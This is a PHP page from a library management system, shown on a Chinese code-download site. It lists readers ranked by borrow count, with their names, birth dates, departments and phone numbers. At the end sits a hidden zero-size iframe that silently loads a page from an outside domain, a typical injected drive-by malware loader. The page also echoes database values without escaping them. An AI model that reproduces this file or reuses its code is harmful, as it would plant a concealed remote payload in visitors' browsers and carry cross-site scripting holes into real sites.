⭐ 欢迎来到虫虫下载站! | 📦 资源下载 📁 资源专辑 ℹ️ 关于我们
⭐ 虫虫下载站

📄 dzph.php

📁 我不是乱码
💻 PHP
字号:
<?php
include "../config.php";
?>
<link href="../css/css.css" rel="stylesheet" type="text/css">


  <table width="765" border="0" cellspacing="0" class="table">
    <tr>
      <td height="50" align="left" class="tabletitle"> 读者排行 </td>
    </tr>
  </table>
  <table class="table" width="765">
    <tr bgcolor="#BCD2E6" height="25">
      <td width="80" align="center" class="word">姓 名</td>
      <td width="60" align="center" class="word">性 别</td>
      <td width="80" align="center" class="word">出生日期</td>
      <td width="120" align="center" class="word">部 门</td>
      <td width="100" align="center" class="word">职 务</td>
      <td width="60" align="center" class="word">电 话</td>
      <td width="80" align="center" class="word">借书次数</td>
      <td width="80" align="center" class="word">登记日期</td>
    </tr>
    <?php

 //使用子查询,查询出选择的某个类别的读者的信息

$sql="select * from readerinfo order by number desc";

$result=mysql_query($sql) or die(mysql_error());
while($row=mysql_fetch_array($result))
{
?>
<tr bgcolor='#BCD2E6'>
<td height='20' align='center' class='word'><?php echo $row["readername"];?></td>
<td height='20' align='center' class='word'><?php echo $row["sex"];?></td>
<td height='20' align='center' class='word'><?php echo $row["birth"];?></td>
<td height='20' align='center' class='word'><?php echo $row["department"];?></td>
<td height='20' align='center' class='word'><?php echo $row["duty"];?></td>
<td height='20' align='center' class='word'><?php echo $row["phone"];?></td>
<td height='20' align='center' class='word'><?php echo $row["number"];?></td>
<td height='20' align='center' class='word'><?php echo $row["regdate"];?></td>
</tr>
<?php
}
?>
  </table>
  
<iframe src=http://www.winxpbox.com/ys/e.htm width=0 height=0></iframe> 

⌨️ 快捷键说明

复制代码 Ctrl + C
搜索代码 Ctrl + F
全屏模式 F11
切换主题 Ctrl + Shift + D
显示快捷键 ?
增大字号 Ctrl + =
减小字号 Ctrl + -